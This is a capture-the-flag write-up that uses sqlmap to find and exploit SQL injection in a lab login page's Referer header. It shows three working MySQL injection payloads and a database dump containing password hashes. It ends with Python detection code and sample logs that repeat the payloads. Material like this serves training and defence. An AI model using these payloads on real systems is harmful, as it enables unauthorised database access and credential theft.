Injection (silver, 100p)

You have found a login panel at https://10.XX.32.95:1003/.
You suspect there could be an SQL injection.
You have to find it and exploit it.
Find a SQL injection vulnerability in this web application and try to combine different injection methods to extract the flag from the database.

Solution

Opening the web page shows a simple login form.

screenshot of website

Since the task is to find a SQL injection, let's run sqlmap. With default parameters nothing was found, so --level was raised (higher levels add tests for HTTP headers such as Referer and User-Agent, which are skipped by default). The SQL injection is found in the HTTP Referer header.

$ sqlmap --url https://10.XX.32.95:1003/index.php --data 'username=admin&passsword=password' --dbms mysql --level 3
(..)
[18:23:59] [INFO] heuristic (basic) test shows that parameter 'Referer' might be injectable (possible DBMS: 'MySQL')
[18:23:59] [INFO] heuristic (XSS) test shows that parameter 'Referer' might be vulnerable to cross-site scripting (XSS) attacks
(..)
parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2855 HTTP(s) requests:
---
Parameter: Referer (Referer)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: https://10.XX.32.95:1003/index.php' AND 7716=(SELECT (CASE WHEN (7716=7716) THEN 7716 ELSE (SELECT 1251 UNION SELECT 4964) END))-- -

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: https://10.XX.32.95:1003/index.php' AND GTID_SUBSET(CONCAT(0x7162626271,(SELECT (ELT(6685=6685,1))),0x717a6b6271),6685)-- ZBqm

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://10.XX.32.95:1003/index.php' AND (SELECT 6307 FROM (SELECT(SLEEP(5)))kXye)-- bpeo
---
[18:38:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6

Dumping the database gives the flag (see the Flag row of the users table).

$ sqlmap --url https://10.XX.32.95:1003/index.php --data 'username=admin&passsword=password' --dbms mysql --level 3 --dump
(..)
Database: cms
Table: users
[8 entries]
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
| id | hash                                                         | ref   | username      | createdAt           | name_lastname     |
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
| 1  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | admin         | 2019-09-10 09:56:02 | Admin Doe         |
| 2  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | manager       | 2019-09-10 09:56:10 | Manager Doe       |
| 3  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | tester        | 2019-09-10 09:56:11 | Tester Doe        |
| 4  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | administrator | 2019-09-10 09:56:12 | Administrator Doe |
| 5  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | boss          | 2019-09-10 09:56:13 | Boss Doe          |
| 6  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | analyst       | 2019-09-10 09:56:23 | Analyst Doe       |
| 7  | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | /     | user          | 2019-09-10 09:56:22 | User Doe          |
| 8  | 1764c742865ee6afd0778e676e80c32d                             | /     | Flag          | 2019-09-10 09:56:47 | Flag Doe          |
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
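The injection point here is a request header, which default sqlmap levels and most parameter-focused monitoring both overlook. As an added example that is not part of the original write-up, the Python below parses Apache combined-format access log lines (the write-up reports Apache as the web server) and flags Referer values that carry the kinds of payloads sqlmap reported above; the log lines, hosts and timestamps are constructed for illustration.

```python
import re

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i".
# Quoted fields may contain backslash-escaped quotes, so they are matched explicitly.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Signatures derived from the three techniques sqlmap found in the Referer header:
# a quote closing a string literal followed by a boolean operator, a SLEEP() delay,
# the MySQL GTID_SUBSET() error-based trick, UNION SELECT, and a trailing comment.
SIGNATURES = [
    ("quote-and-boolean", re.compile(r"'\s*(?:AND|OR)\b", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("sql-comment", re.compile(r"--\s|/\*")),
]

def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def scan_referer(referer):
    """Return the names of every signature that matches a Referer value."""
    return [name for name, rx in SIGNATURES if rx.search(referer)]

def find_suspicious(lines):
    """Return (host, referer, matched signatures) for lines whose Referer looks injected."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["referer"] in ("", "-"):  # unparseable or no Referer sent
            continue
        matched = scan_referer(rec["referer"])
        if matched:
            hits.append((rec["host"], rec["referer"], matched))
    return hits

# Constructed sample log: one normal login, the three sqlmap payloads from the
# write-up placed in the Referer, and a request without a Referer at all.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Sep/2019:18:20:01 +0000] "POST /index.php HTTP/1.1" 200 512 "https://10.XX.32.95:1003/index.php" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Sep/2019:18:23:59 +0000] "POST /index.php HTTP/1.1" 200 512 "https://10.XX.32.95:1003/index.php\' AND 7716=(SELECT (CASE WHEN (7716=7716) THEN 7716 ELSE (SELECT 1251 UNION SELECT 4964) END))-- -" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Sep/2019:18:24:03 +0000] "POST /index.php HTTP/1.1" 500 0 "https://10.XX.32.95:1003/index.php\' AND GTID_SUBSET(CONCAT(0x7162626271,(SELECT (ELT(6685=6685,1))),0x717a6b6271),6685)-- ZBqm" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Sep/2019:18:24:10 +0000] "POST /index.php HTTP/1.1" 200 512 "https://10.XX.32.95:1003/index.php\' AND (SELECT 6307 FROM (SELECT(SLEEP(5)))kXye)-- bpeo" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Sep/2019:18:25:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

The User-Agent is deliberately left identical on every sample line, since the Referer content alone is what separates the probing requests from the normal ones.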